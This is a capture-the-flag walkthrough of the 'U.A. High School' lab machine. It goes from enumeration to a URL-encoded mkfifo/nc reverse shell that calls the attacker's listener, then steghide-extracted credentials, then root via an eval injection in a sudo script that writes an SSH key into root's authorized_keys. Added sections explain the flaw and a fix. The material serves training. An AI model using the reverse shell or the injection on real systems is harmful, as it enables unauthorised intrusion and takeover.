# U.A. High School

`enumeration` `sudo -l` `php`

* Machine name: U.A. High School
* Difficulty: Easy
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 09:27 EDT
Nmap scan report for 10.10.108.93
Host is up (0.042s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

### HTTP (80)

A dirsearch scan leads us to /assets/, which returns a blank page. That looks like a PHP page: requesting "assets/test.txt" at random gives "not found", whereas "index.php" brings back the same blank page. So we try different PHP parameter names against it.

## Initial access

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FPvikz5JInFoDZnusGRmN%2F22a337f3a4fcda630efca1c1ce4d300d.png?alt=media&#x26;token=c291181e-b0f9-48ed-b87f-cdb2127aaee5" alt=""><figcaption></figcaption></figure>

It works! We use the payload `rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.9.73.224%201234%20%3E%2Ftmp%2Ff` to get a reverse shell on port 1234. Decoded, that string is the classic mkfifo/nc reverse shell, `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.9.73.224 1234 >/tmp/f`, pointed at our listener on 10.9.73.224:1234; it is URL-encoded because it travels inside a GET parameter.

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                     
listening on [any] 1234 ...
connect to [10.9.73.224] from (UNKNOWN) [10.10.51.222] 52986
bash: cannot set terminal process group (757): Inappropriate ioctl for device
bash: no job control in this shell
www-data@myheroacademia:/var/www/html/assets$ whoami
whoami
www-data
```

Let's look around /var/www for anything interesting; /var/www/Hidden_Content holds a single file.

```
www-data@myheroacademia:/var/www/Hidden_Content$ ls
ls
passphrase.txt
www-data@myheroacademia:/var/www/Hidden_Content$ cat *
cat *
QWxsbWlnaHRGb3JFdmVyISEhCg==
www-data@myheroacademia:/var/www/Hidden_Content$ cat passphrase.txt | base64 -d
</www/Hidden_Content$ cat passphrase.txt | base64 -d
AllmightForEver!!!
```

The passphrase is of no use for now. We keep searching and download the images found in /assets/images; the browser cannot display them because the files are malformed.

```
www-data@myheroacademia:/var/www/html/assets/images$ ls
ls
oneforall.jpg  yuei.jpg

┌──(kali㉿kali)-[~/thm/school]
└─$ curl -O http://10.10.51.222/assets/images/oneforall.jpg
┌──(kali㉿kali)-[~/thm/school]
└─$ curl -O http://10.10.51.222/assets/images/yuei.jpg
```

Let's try to extract hidden data from these files.

```
┌──(kali㉿kali)-[~/thm/school]
└─$ steghide extract -sf oneforall.jpg
Enter passphrase: 
steghide: the file format of the file "oneforall.jpg" is not supported.
```

steghide's "file format not supported" means the file's leading bytes (its magic number) do not match any format steghide handles (JPEG, BMP, WAV, AU), so the header is the part to inspect. Comparing the first bytes of oneforall.jpg with the list of known file signatures, we fix the header with hexeditor.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FTi8Wwe1PjyqdzwzrFGNU%2F0875a0725b194050a62a517eff3580eb.png?alt=media&#x26;token=b15565d4-552f-45a4-9102-b877278d9525" alt=""><figcaption></figcaption></figure>

{% embed url="<https://en.wikipedia.org/wiki/List_of_file_signatures>" %}

With the header repaired steghide accepts the file, and the passphrase recovered earlier from /var/www/Hidden_Content (`AllmightForEver!!!`) unlocks the hidden content: creds.txt.
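The following is an added example, not part of the original writeup: a POSIX-shell version of the check and repair done in hexeditor above. It identifies a file by its magic bytes instead of its extension and, on the assumption that the corruption consisted of a PNG signature written over the first eight bytes of a JFIF JPEG, writes the JPEG SOI/APP0 prefix back. The sanity check on the bytes at offset 8 (`IF\0\1`, the tail of the JFIF identifier followed by the major version) refuses to patch a file that does not fit that assumption; the sample file in the usage is constructed, not the room's image.

```shell
#!/bin/sh
# Added example (not from the writeup): magic-byte check and header repair.
# Assumes the damage is exactly a PNG signature over the first 8 bytes of a
# JFIF JPEG; anything else is left alone.

# Hex string of the first $2 bytes of file $1 (od is POSIX; lower-case hex).
hexhead() { od -An -tx1 -N"$2" "$1" | tr -d ' \n'; }

# Identify a file by its signature rather than by its extension.
detect_type() {
    case "$(hexhead "$1" 8)" in
        ffd8ff*)           echo jpeg ;;
        89504e470d0a1a0a)  echo png ;;
        474946383[79]61*)  echo gif ;;
        *)                 echo unknown ;;
    esac
}

# Put the JFIF prefix back over a PNG signature.  Bytes 8..11 must still read
# "IF" 0x00 0x01 (end of "JFIF", NUL, major version) or we refuse to touch it.
repair_png_stamped_jpeg() {
    file="$1"
    case "$(hexhead "$file" 12)" in
        89504e470d0a1a0a49460001*) ;;
        *) echo "refusing: '$file' is not a PNG-stamped JFIF header" >&2; return 1 ;;
    esac
    # FF D8 FF E0 00 10 4A 46: SOI, APP0 marker, segment length 16, "JF".
    # Octal escapes keep this portable to sh implementations without \x.
    printf '\377\330\377\340\000\020JF' | dd of="$file" bs=1 count=8 conv=notrunc 2>/dev/null
}

# Usage: sh fixjpeg.sh oneforall.jpg
if [ $# -ge 1 ]; then
    echo "before: $(detect_type "$1")"
    repair_png_stamped_jpeg "$1" && echo "after:  $(detect_type "$1")"
fi
```

After the repair, `detect_type` reports jpeg and the file is worth a second `steghide extract -sf` pass; if the script refuses, the corruption is something other than an 8-byte signature swap and the hex dump has to be read by hand against the signature list.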

```
┌──(kali㉿kali)-[~/thm/school]
└─$ cat creds.txt                                     
Hi Deku, this is the only way I've found to give you your account credentials, as soon as you have them, delete this file:

deku:One?For?All_!!one1/A
```

```
www-data@myheroacademia:/var/www/html/assets/images$ su deku
su deku
Password: One?For?All_!!one1/A
```

## Privilege escalation

```
deku@myheroacademia:~$ sudo -l
sudo -l
[sudo] password for deku: One?For?All_!!one1/A

Matching Defaults entries for deku on myheroacademia:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User deku may run the following commands on myheroacademia:
    (ALL) /opt/NewComponent/feedback.sh
```

```
deku@myheroacademia:~$ cat /opt/NewComponent/feedback.sh
cat /opt/NewComponent/feedback.sh
#!/bin/bash

echo "Hello, Welcome to the Report Form       "
echo "This is a way to report various problems"
echo "    Developed by                        "
echo "        The Technical Department of U.A."

echo "Enter your feedback:"
read feedback


if [[ "$feedback" != *"\`"* && "$feedback" != *")"* && "$feedback" != *"\$("* && "$feedback" != *"|"* && "$feedback" != *"&"* && "$feedback" != *";"* && "$feedback" != *"?"* && "$feedback" != *"!"* && "$feedback" != *"\\"* ]]; then
    echo "It is This:"
    eval "echo $feedback"

    echo "$feedback" >> /var/log/feedback.txt
    echo "Feedback successfully saved."
else
    echo "Invalid input. Please provide a valid input." 
fi
```

{% embed url="<https://man7.org/linux/man-pages/man1/eval.1p.html>" %}

The `eval` builtin joins its arguments into one string and hands that string back to the shell to be parsed and executed, so `eval "echo $feedback"` runs whatever we type as shell syntax, not as text. The `if` blacklists the usual command-substitution and command-separator characters (backtick, `)`, `$(`, `|`, `&`, `;`, `?`, `!`, `\`), but it does not filter `>` or `<`. A redirection therefore survives the check, and because the script runs under sudo, `echo <anything> > /path` writes a line of our choosing into any file as root. The later append to /var/log/feedback.txt is harmless; the damage comes entirely from the `eval`.
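To make the mechanism concrete, here is an added example, not the room's script: the same blacklist-then-eval pattern as feedback.sh, confined to a throwaway directory so the smuggled redirection lands somewhere harmless, next to a hardened handler that prints the input as data. The bash `[[ != *"x"* ]]` chain is rewritten as an equivalent POSIX `case`; the key line fed to it is a constructed placeholder, not a real key.

```shell
#!/bin/sh
# Added example (not feedback.sh itself): vulnerable and hardened handlers for
# the feedback form, run inside a sandbox directory instead of as root.

# Same nine blacklisted characters as feedback.sh; returns 0 when input passes.
passes_filter() {
    case "$1" in
        *'`'*|*')'*|*'$('*|*'|'*|*'&'*|*';'*|*'?'*|*'!'*|*'\'*) return 1 ;;
    esac
    return 0
}

# Vulnerable handler: identical 'eval "echo $feedback"'.  Runs inside $2 so a
# smuggled "> file" creates the file there rather than in /root/.ssh.
vulnerable_handler() {
    feedback="$1"; sandbox="$2"
    passes_filter "$feedback" || { echo "Invalid input." >&2; return 1; }
    ( cd "$sandbox" && eval "echo $feedback" ) >/dev/null
    printf '%s\n' "$feedback" >> "$sandbox/feedback.log"   # the log append is harmless
}

# Hardened handler: the input is printed as data and never re-parsed, so the
# blacklist is not even needed.
hardened_handler() {
    feedback="$1"; sandbox="$2"
    ( cd "$sandbox" && printf '%s\n' "$feedback" ) >/dev/null
    printf '%s\n' "$feedback" >> "$sandbox/feedback.log"
}

# Demonstration: the same "public key > authorized_keys" line through both.
demo() {
    sb="$(mktemp -d)"
    vulnerable_handler 'ssh-ed25519 AAAAexamplekey kali@kali > planted_key' "$sb"
    ls "$sb"        # planted_key and feedback.log: the redirection executed
    rm -rf "$sb"
    sb="$(mktemp -d)"
    hardened_handler 'ssh-ed25519 AAAAexamplekey kali@kali > planted_key' "$sb"
    ls "$sb"        # feedback.log only: '>' stayed inside the string
    rm -rf "$sb"
}
demo
```

The fix is to delete the `eval`, not to lengthen the blacklist: denylists of shell metacharacters always miss something (`>`, `<` and globbing with `*` here), whereas `printf '%s\n' "$feedback"` cannot execute anything regardless of what the user types. The sudo rule itself also deserves a look, since `(ALL)` on a script that interprets user input is equivalent to `(ALL) /bin/bash`.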

We generate an SSH key pair and use the script to write the public key into /root/.ssh/authorized_keys (the path sshd actually reads; `>` overwrites any existing entries, `>>` would append). The private key is saved as id_rsa even though it is an ed25519 key; the file name makes no difference to ssh.

```
┌──(kali㉿kali)-[~/thm/school]
└─$ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): /home/kali/thm/school/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/thm/school/id_rsa
Your public key has been saved in /home/kali/thm/school/id_rsa.pub
The key fingerprint is:
SHA256:RLJSG+LvGIEcOYeYaneEKM4bgIvwrSx43alMALDe3oo kali@kali
The key's randomart image is:
+--[ED25519 256]--+
|+oooo + .        |
|O++=.+ *         |
|X+o+= o .        |
|==+..= .         |
|oo+=o...S        |
|o.= ++o          |
| o +.o.          |
|  . +            |
| E .             |
+----[SHA256]-----+
```

```
deku@myheroacademia:~$ sudo /opt/NewComponent/feedback.sh
sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form       
This is a way to report various problems
    Developed by                        
        The Technical Department of U.A.
Enter your feedback:
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJQxkRhO0zcKwM4WoLFI36gO7GcM1h7MRvK6qcuMwxjA kali@kali > /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJQxkRhO0zcKwM4WoLFI36gO7GcM1h7MRvK6qcuMwxjA kali@kali > /root/.ssh/authorized_keys
It is This:
Feedback successfully saved.
```

```
┌──(kali㉿kali)-[~/thm/school]
└─$ ssh root@10.10.175.181 -i id_rsa
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-153-generic x86_64)

Last login: Mon Sep 16 13:41:11 2024 from 10.9.73.224
root@myheroacademia:~# whoami
root
```

We're root!
